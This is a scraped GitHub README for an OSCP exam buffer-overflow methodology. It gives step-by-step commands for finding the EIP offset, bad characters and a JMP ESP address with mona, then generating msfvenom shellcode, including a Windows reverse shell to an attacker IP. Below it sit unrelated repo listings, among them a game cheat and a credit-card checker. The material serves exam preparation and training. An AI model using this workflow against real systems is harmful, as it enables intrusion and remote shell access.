This is a walkthrough about understanding the #BoF machine present in the #OSCP exam.

Overview

Buffer Overflow methodology

GitHub Repo stars GitHub last commit (branch) GitHub

Python 3 GitHub Workflow Status

Twitter Follow

Introduction

These are 7 simple python scripts and a methodology to ease (not automate !) the exploitation. Each script targets a phase of the exploitation :

  1. Trigger the BoF (this is facultative for OSCP since they give you a code snippet)
  2. Find the EIP offset
  3. Confirm the offset
  4. Find the badchars
  5. Confirm badchars + find JMP ESP instruction
  6. Confirm code execution (pop calc)
  7. Exploit host

It's based on the do stack buffer overflow good" project (BTW, it's awesomely explained).

How to use

Follow each step and you'll be able to craft a working example of a BoF exploitation.

All the specific variable are stored in 1 single resource file, to avoid any confusion during the exam.

After each step, fill the proper variables with values found and they'll be re-used for the next step

Note: If after each debug operation performed, the application has become unresponsive; Immunity Debugger should be closed first, then the "vulnapp.exe" application should be restarted, and Attach and Run should be done on Immunity Debugger.

0. Pre-start

Fill in the following variables in the resource file depending on the host to attack :

  • RHOST : the IP address of the host
  • RPORT : the port on which to access the application to exploit

1. Segmentation fault : 1_segfault.py

Send enough length string for victim system crash.

Please note that the total length to input is often given in the exmaple they provide in the exam.

Note the offeset in PARAMETERS.py, in the variable offset_eip.

2. Find the offset : 2_find_offset.py

Generate the pattern (adapt the buffer lenght) :

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <String_Length>

buf += ("<PATTERN>")

Put the output into the variable buf in 2_find_offset.py & send it.

Once the app crashes, note down the value of the EIP register (which is the address of the next operation to be executed).

If needed : convert the EIP value to ASCII : echo "<EIP_value>" | xxd -r -p

Find the offset at which the sequence is met in the pattern :

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <EIP_value>

Or, type this in Immunity Debugger : !mona findmsp.

Note the value of the EIP offet in the variable offset_eip in PARAMETERS.py, and the value of the ESP offset in the variable offset_esp.

3. Control the EIP : 3_confirm_offset.py

Execute this script as is.

In Immunity Debugger, make sure that

  • BBBB in the EIP (in hex, so 42424242)
  • CCCCDDDDD..... is written in what ESP points to

4. Find the bad chars : 4_find_badchars.py

Send it to the application

In Immunity Debugger, make mona create a list of badchars :

!mona bytearray –cpb “\x00”

The console output will tell you where it has been saved.

Compare this file with the stack contents :

!mona compare -a ESP -f <file_with_bad_chars>
!mona compare -a <WHATEVER ADDRESS> -f <file_with_bad_chars>

**Note: **always use the full path to the file !

In the mona output, Possibly bad chars are output. Put them in the badchars array in PARAMETERS.py.

5. Confirm badchars & find a JMP ESP instruction : 5_find_jmp_esp.py

a. Confirm badchars

Make sure the badchars identified are mentionned in the PARAMETERS.py file.

Execute the script.

Re-generate a badchar sequence on mona :

!mona bytearray -cpb "\x00\x04\x05\xA2\xA3\xAC\xAD\xC0\xC1\xEF\xF0"

The console output will tell you where it has been saved.

Compare the bytearray.bin (use the full filepath) and the buffer to make sure they are the same. That will mean that no new badchar have been detected :

!mona compare -a ESP -f <file_with_bad_chars>
!mona compare -a <WHATEVER ADDRESS> -f <file_with_bad_chars>

The mona output status should be unmodified and you should get a message in the console saying : !!! Hooray, normal shellcode unmodified !!!

This mean that no other badchars have been detected.

b. Find a JMP ESP

Ask mona to find the instruction JMP ESP that will allow the processor to execute whatever we have put in the stack.

!mona jmp -r esp -cpb "<bad_chars>"       formatted like this : "\x00\x01"

Put the address returned in the variable ptr_jmp_esp in PARAMETERS.py

6. Pop calc : 6_pop_calc.py

This will confirm the code execution on the target host. This can be used to validate the build-up of the exploit, and set a working basis.

Launch this to produce the shellcode that will make calc pop on the target :

msfvenom -p windows/exec -b '<badchars>' -f python --var-name shellcode_calc \
CMD=calc.exe EXITFUNC=thread

Insert the output (python variable shellcode_calc) in the script 6_pop_calc.py.

In the script, we will also move ESP up in the stack (instruction SUB ESP,0x10) This is to avoid the ESP overwrite by the encoder of the payload. Some guys use a NOP sled, here is a more proper way ;)

Launch the script and enjoy popping calc!

7. Create shellcode : 7_exploit.py

Now, you can craft any other shellcode as long as you respect the badchars :

msfvenom -p windows/shell_reverse_tcp LHOST=<Attacker_IP> LPORT=<Attacker_Port> \
-f py -b '<badchars>' -e x86/shikata_ga_nai -var-name shellcode

Insert the output (python variable shellcode_calc) in the script 7_exploit.py.

Owner
3isenHeiM
Just a pentester knowing some python/bash, trying to make his life smarter ;) Also an Linux/CyberSec/CTF lover
3isenHeiM
A simple library for interacting with Amazon SQS.

qoo is a very simple Amazon SQS client, written in Python. It aims to be much more straight-forward to use than boto3, and specializes only in Amazon

Jacobi Petrucciani 2 Oct 30, 2020
Financial portfolio optimisation in python, including classical efficient frontier, Black-Litterman, Hierarchical Risk Parity

PyPortfolioOpt has recently been published in the Journal of Open Source Software 🎉 PyPortfolioOpt is a library that implements portfolio optimizatio

Robert Martin 3.2k Jan 02, 2023
discord voice bot to stream radio

Radio-Id Bot (Discord Voice Bot) Radio-id-bot (Radio Indonesia) is a simple Discord Music Bot built with discord.py to play a radio from some Indonesi

Adi Fahmi 20 Sep 20, 2022
HinamiRobot - Telegram Group Manager Bot Written In Python Using Pyrogram

✨ HINAMI CHAN ✨ Telegram Group Manager Bot Written In Python Using Pyrogram. Rea

DARK LEGEND088 2 Jan 27, 2022
Gathers data and displays metrics related to climate change and resource depletion on a PowerBI report.

Apocalypse Status Dashboard Purpose Climate change and resource depletion are grave long-term dangers. The code in this repository will pull data from

Summer Is Here 1 Nov 12, 2021
Astro Bot With Golang

Astro-Bot Features: Astronomy Picture of the day Horoscope People In Space How we built it Our team was broken, one person didn't do anything the othe

Vaarun Sinha 1 Nov 21, 2021
A Discord Server Cloner Which Can Clone Any Discord Server In Just Few Minutes

A Discord Server Cloner Which Can Clone Any Discord Server In Just Few Minutes.

samet 4 Jul 23, 2022
Aria/qBittorrent Telegram mirror/leech bot

This is a Telegram Bot written in Python for mirroring files on the Internet to your Google Drive or Telegram. Based on python-aria-mirror-bot Feature

28 Dec 25, 2022
Upload on Doodstream by Url, File and also by direct forward post from other channel...

Upload on Doodstream by Url, File and also by direct forward post from other channel...

Pʀᴇᴅᴀᴛᴏʀ 8 Aug 10, 2022
Fully undetected auto skillcheck hack for dead by daylight that works decently well

Auto-skillcheck was made by Love ❌ code ✅ ❔ ・How to use Start off by installing python ofc Open cmd in the same directory and type pip install -r requ

Rdimo 10 Aug 13, 2022
Sends messages to a Discord webhook whenever you make a new commit to your local git repository.

Git-Notif Sends messages to a Discord webhook whenever you make a new commit to your local git repository. Usage Just drop notifier.py into your git h

1 May 29, 2022
🦈 Blahaj is a discord bot that shares random images of himself on discord.

🦈 Blahaj Bot Blahaj is a discord bot that shares random images of himself on discord. ⚙️ Developer's Guide To use the bot, follow along the steps Hea

Atul Anand 3 Oct 21, 2022
Self-adjusting, auto-compounding multi-pair DCA crypto trading bot using Python, AWS Lambda & 3Commas API

Self-adjusting, auto-compounding multi-pair DCA crypto trading bot using Python, AWS Lambda & 3Commas API The following code describes how we can leve

Jozef Jaroščiak 21 Dec 07, 2022
Decryption utility for PGP Whole Disk Encryption

wdepy: Decryption and Inspection for PGP WDE Disks This is a small python tool to inspect and decrypt disk images encrypted with PGP Whole Disk Encryp

Brendan Dolan-Gavitt 17 Oct 07, 2022
Credit Card And SK Checker Written In Python

Credit Card And SK Checker Written In Python

Rimuru Tempest 57 Jan 08, 2023
Cloudshell-sandbox-reporter - Helper modules and classes for writing to Cloudshell sandbox console

Cloudshell Sandbox Reporter This project provides utility classes for formatting

QualiLab 2 Sep 07, 2022
A Telegram Filter Bot, Support Unlimited Filter. Also, The Bot can auto-filter telegram File | video

A Telegram Filter Bot, Support Unlimited Filter. Also, The Bot can auto-filter telegram File | video

Hash Minner 3 Nov 27, 2021
Open Source Discord bot with many cool features like Weather, Balance, Avatar, User, Server, RP-commands, Gif search, YouTube search, VK post search etc.

Сокобот Дискорд бот с открытым исходным кодом. Содержит в себе экономику, полезные команды (!аватар, !юзер, !сервер и тд.), рп-команды (!обнять, !глад

serverok 2 Jan 16, 2022
Backend.AI Client Library for Python

Backend.AI Client The official API client library for Backend.AI Usage (KeyPair mode) You should set the access key and secret key as environment vari

Lablup 10 Feb 10, 2022